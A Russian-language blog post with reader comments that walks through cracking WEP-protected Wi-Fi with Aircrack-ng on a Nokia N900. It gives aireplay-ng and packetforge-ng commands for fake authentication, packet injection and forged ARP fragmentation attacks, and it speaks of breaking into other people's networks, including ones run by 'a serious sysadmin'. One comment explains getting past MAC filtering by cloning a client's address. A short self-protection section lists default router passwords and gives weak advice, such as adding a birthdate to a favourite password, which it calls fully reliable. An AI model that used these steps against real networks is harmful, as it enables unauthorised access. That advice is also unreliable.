Aircrack-ng: Взлом WEP инъекцией+ собственная безопасность[часть 3]
Это третья часть статьи, рекомендую сначала прочесть первую часть http://maemos.ru/2011/02/12/aircrack-ng-1-1-more/, а до этого прочесть что-же вообще такое Aircrack-ng, его возможности и обозначения тут http://maemos.ru/2010/06/08/aircrack-ng
Итак, взлом WEP через консоль мы обсуждали по ссылке которая чуть выше, теперь обсудим взлом через графический интерфейс + небольшой бонус ;)
Вместе с новыми драйверами у нас появилась возможность использовать 2 функции:
1. Фальшивая аутефикация
2. Пакетная инъекция
Итак, находим точку и нажимаем Start package capture и после этого у нас загорелись 2 новые кнопки, это Authenticate и Start Package Injection
по очереди кликаем на одно и второе, открываются 2 новых окна
Итак, что мы видим тут-а ничего хорошего, точка доступа защищена от инъекций Как видим на скриншоте 1 и 2 wifi просто обрубает нас при попытке генерировать трафик, и как видно на скриншоте 3 роутер принял только сотню пакетов из 86-ти тысяч, виною тому фирма роутера D-Link…Эти роутеры считаются лучшими по соотношению цена-качество, действительно, я считаю эту фирму самой лучшей для домашней сети (для офиса Cisco и там будет та-же ошибка, что и тут)но они некоторые действия по взлому считают за системную ошибку и отключают пользователя.
Ну и что нам делать? А тут вот уже без консоли не обойтись, включаем отлов пакетов кнопкой Start package capture и в появившемся окне кликаем на Xterminal и далее создать
Далее возвращаемся обратно в fAircrack и переходим на закладку monitor. Там записываем MAC address куда угодно, переключаемся обратно в консоль и вводим следующее:
root
# aireplay-ng -1 6000 –o 1 –q 10 –e *имя точки* -a *MAC адрес точки* -h *записанный вами собственный MAC адрес* wlan0
Нажимаем enter и пытаемся разобраться что-же мы сделали.
-1 означает что вы отсылаете запрос на фальшивую аутефикацию(роутер будет думать, что вы к нему подключены)
6000 – пауза в час, до прохождения повторной ложной аутефикации.
-o – отправление только одного набора пакетов, вот этот пункт чаще всего и смущает Dlink поскольку без этого пункта в одно время приходят разные пакеты
-q – отправлять пакеты поддержки соединения каждые 10 секунд
Смотрим итог:
И как мы видим, получилось! То есть как мы видим на первом скриншоте каждые 10 секунд посылается пакет поддержки соединения (-q 10) а пакеты повторной аутефикации пошлются только через час.
Теперь можно на всякий случай проверить через консоль работает ли вообще инъекция, создаём еще одно окно в терминале и вводим:
root
#aireplay-ng -9 –a *МАК адрес точки* –e *имя точки доступа* wlan0
Можно вводить только имя или только мак адрес, как вам удобно.
Работает на 100%, все тесты прошли успешно, значит можем взламывать.
Переходим на закладку fAircrack и там нажимаем Start Package Injection и видим следующее, работает! Ошибка дисассоциации исчезла, ну а далее смотрим на отлов пакетов
Вуаля! 10 тысяч пакетов от роутера нам за 56-секунд! Тоесть 400 тысяч за 40 минут и это 100% взлом сети со всеми подстраховками!
Ну а если видим что-то вроде этого:
То вы не включили драйвера, для этого вернитесь на закладку monitor в графе Injection кликните раз на Enable
Ну если не вышло с фальшивой аутефикацией, то по старинке ждём, пока наловится много пакетов
Потом наловив или сгенерировав примерно 100-400 тысяч пакетов, переходим на вкладку decrypt
Выбрать файл и нажать decrypt
ну а после как в случае с WPA, если наловили достаточно-получим ключ
Так-же можно использовать так называемые фрагментированные атаки- chop chop атака и обычная фрагменированная, работают они так-же как и инъекция, только разница в том, что на аппарате создаётся файл формата xor в котором содержится PRGA (pseudo random generation algorithm). Ну и после получения этого файла можно сделать фальшивую аутефикацию с генерацией трафика. Плюсы этого метода в том, что в отличии от инъекции они практически не «палятся», у меня не заработало, советую использовать только если ломаете сеть серьёзного сисадмина. Вот как вобще это выглядит
Хотите попробывать? Не вопрос, вот вам комманды
Фрагментация
root
# aireplay-ng -9 -e *имя точки* -b *MAC адрес точки* wlan0
Можно либо мак адрес, либо имя, как вам удобно
# packetforge-ng -0 -a *адрес точки* -h *ваш MAC адрес* -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w arp-zapros
Где -0 поддельный ARP запрос
-k назначеный IP адрес
-l исходный IP адрес
-y использование PRGA
-w записывать полученные результаты в формате pcap
Ну а потом создаём широковещательный запрос(тобишь пойдёт во все стороны, но взламываемый файфай будет на него реагировать)
# aireplay-ng -2 -r arp-zapros wlan0
-2 выбор интерактивной структуры
-r название структуры
Wlan0 сетевой интерфейс\
Если не пашет, попробуем подделать ARP запрос как будто он идёт из настоящей сети:
# packetforge-ng -0 -a *адрес точки* -h *ваш MAC адрес* -k 192.168.1.1(или 192.168.0.1) -l 192.168.1.250(или 192.168.0.250) -y fragment*.xor -w arp-zapros
# aireplay-ng -2 -r arp-zapros wlan0
Ну а теперь как в случае с инъекцией примерно по 10 тысяч пакетов в минуту пойдёт от точки доступа.
Так-же ждём, расшифровываем и получаем ключ от сети!
Собственная безопасность
Чтобы вы не стали наглядным примером для такой статьи, запомните следующее:
1. Пароль должен быть не менее 12-ти символов
2. Пароль должен состоять из цифр и букв, к примеру возьмите ваш любимый пароль и подставьте к нему дату своего рождения, и запоминаем и надёжность 100%
3. Пароль должен быть уникальным (ненадо использовать шаблоны типа qwerty)
4. Хотя-бы раз в месяц залезать по адресу в браузере 192.168.0.1 или 192.168.1.1 вводить логин и пароль(обычно логин admin, а пароль password, pass, nimda, 123, 1234, 12345, 0000, admin) и проверить логи, кто подключался, кто атаковал
5. Ну и естественно не болтать пароль всему подъезду/офису
Заключение
Ну и как мы видим из статьи, шансы взломать WPA намного меньше, чем WEP, но это всё-таки реально сделать.
Aircrack-ng до конца еще так и не заработал на нашем аппарате, но прогресс на лицо, к тому-же он обзавёлся GUI оболочкой, что поможет усвоить его новичку.
Так-же хочу отметить, что на сайте http://download.ru/products/wordlist-editor можно скачать бесплатную, но очень удобную прогу по редактированию баз паролей, а с сайта http://www.uinc.ru/forum/faqs/wordlist.shtml можно скачать как базы паролей, так и наткнуться на другие сайты с паролями.
Ну и напоследок, взлом в России уголовно наказуем по статье 272 УК РФ, поэтому вы считаетесь предупреждёнными, об ответственности. Данная статья написана только в ознакомительных целях для аудита собственной беспроводной сети.
Так-же хочу заметить что в режиме монитора и в режиме перебора по словарю аппарат греется, не исключён случай поломки, так что всё делаете на свой страх и риск.
С вами был Libert, все вопросы на форум http://maemos.ru/forum/ В скором времени если найду вариант-напишу как взламывать почту с телефона, ничего не обещаю, как получится
Так-же по теме:
Взлом WEP http://maemos.ru/2010/06/08/aircrack-ng/
Взлом Windows XP http://maemos.ru/2010/08/09/metasploit/
Взлом Вконтакте.ру http://maemos.ru/2011/01/21/crack-hack-vkontakte-n900-maemo-wi-fi
P.S. Закончил писать в 7 утра, если что не так, поправьте в коментах, сейчас уже плохо соображаю.
P.P.S Немного не в тему, может кто сталкивался, у меня при включении экрана если быстро тыкнуть на что-либо подвисает хилдон, тупо ничего не нажимается на экране, ни один виджет, ни один ярлык, нужно через консольку перезапускать… кто сталкивался, напишите, как избавиться от этой хе…ни, или что вызывает это подвисание, а то я скоро об стенку разобью аппарат, это будет самое лучшее спасибо за статью;)
СПАСИБИЩЕ ЗА ТРУД РОМ!!! ТЫ ЛУЧШИЙ!!!
Скажите, а если у владельца сети стоит MAC-фильтр, то это уже не ломается никак?
Конечно ломается))))Ты попросту смотришь с какого мак адреса подключаются к роутеру и вбиваешь его себе, ну а дальше всё по пнуктам)))
Жень, пасиб))))
Только ты не то выложил)))Статью с последнего архива нужно, там побольше будет и там рассмотрены все возможные инъекции, да и собрана поудобнее, если не сложно, ту выложи, так людям понятнее будет
Сейчас новые вайфаи настраиваются кнопочкой, там совершенно безумный рандомный пароль в 512 бит. Соотв. даже шестисотмегабайтный словарь не поможет, да и молотить такой словарег даже Core i7 будет полдня. Так что взлом WPA/WPA2 на телефоне – что-то типа гильотинки для сигарет в жилетке Вассермана А вот WEP взломать вполне можно.
…но где вы этот WEP найдёте?
Не говоря уж о том, что N900, само собой, проигрывает в чувствительности любому ноуту с Броадкомом, не говоря уж о внешних адаптерах (тот же TP-LINK на Ateros).
———
Если что, мои комменты относятся ко всем статьям цикла. Модерам просьба не возмущаться.
Статьи, кстати, отличные. По бэк-траку бы такое писали – все бы давно шифровались